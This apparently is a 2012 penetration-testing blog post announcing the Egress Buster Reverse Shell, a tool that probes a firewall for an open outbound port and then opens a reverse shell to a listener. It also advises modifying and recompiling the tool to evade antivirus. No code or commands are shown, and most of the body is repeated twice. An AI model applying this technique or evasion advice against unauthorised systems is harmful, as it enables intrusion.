July 09, 2012
Egress Buster Reverse Shell and Bypassing AV
Written by
David Kennedy
Penetration Testing
Security Testing & Analysis
Back in February Dave Kennedy released a tool called Egress Buster that would look for outbound ports and let you know what egress rules were in place behind a firewall. The way this initially worked was by sending TCP packets on each and every port originating from inside the firewall to an externally facing server that was listening on those ports. Today we would like to announce the release of the Egress Buster Reverse Shell which will scan for open ports on the internal network and once an open port has been established, spawn a reverse shell. Benchmark testing showed about a 1,000 ports were tested in under five seconds.
It's almost identical in use from the original egress buster, only once a stable connection is identified, a command prompt will pop up for you to enter commands on the victim machine. Note that the egressbuster shell and listener are not platform specific, they can be run on nix based systems (i.e. Linux, OSX, etc.) and any form of Windows. Below is running the server and having it listen on ports 1-1000.
On the victim machine, here is running the payload without any parameters.
Now we'll kick off the egressbuster reverse shell payload on the victim machine.
Now on the listener side of the house, we have a command shell and have tested over a 1000 ports until we successfully find one that lets us out:
This is effective in situations where you need to deploy a payload to a victim machine and do not know which type of ports they would allow outbound. As an example during a penetration test, we were able to attack the victim via a file upload vulnerability where we could upload and execute binaries however could not figure out a port outbound. Standard ports such as 80, 443, 21, and 53 were all found. However, when utilizing the egress busting technique with the shell payload, we were able to find an obscure port that was allowed outside to the attacker machine.
This is just a rough proof of concept and a simple command shell, in our situation we used the technique to write out a binary file for us to the victim machine and execute.
As with anything custom and new, it won't be picked up by anything Anti-Virus until this blog post comes out. Just modify the source and byte compile it to get around it.
You can download the egress buster reverse shell from the Downloads - Tools and Exploits section. Note that the egressbuster has already been pre-byte complied and has a standard executable. Source code is included in everything.
It's almost identical in use from the original egress buster, only once a stable connection is identified, a command prompt will pop up for you to enter commands on the victim machine. Note that the egressbuster shell and listener are not platform specific, they can be run on nix based systems (i.e. Linux, OSX, etc.) and any form of Windows. Below is running the server and having it listen on ports 1-1000.
On the victim machine, here is running the payload without any parameters.
Now we'll kick off the egressbuster reverse shell payload on the victim machine.
Now on the listener side of the house, we have a command shell and have tested over a 1000 ports until we successfully find one that lets us out:
This is effective in situations where you need to deploy a payload to a victim machine and do not know which type of ports they would allow outbound. As an example during a penetration test, we were able to attack the victim via a file upload vulnerability where we could upload and execute binaries however could not figure out a port outbound. Standard ports such as 80, 443, 21, and 53 were all found. However, when utilizing the egress busting technique with the shell payload, we were able to find an obscure port that was allowed outside to the attacker machine.
This is just a rough proof of concept and a simple command shell, in our situation we used the technique to write out a binary file for us to the victim machine and execute.
As with anything custom and new, it won't be picked up by anything Anti-Virus until this blog post comes out. Just modify the source and byte compile it to get around it.
You can download the egress buster reverse shell from the Downloads - Tools and Exploits section. Note that the egressbuster has already been pre-byte complied and has a standard executable. Source code is included in everything.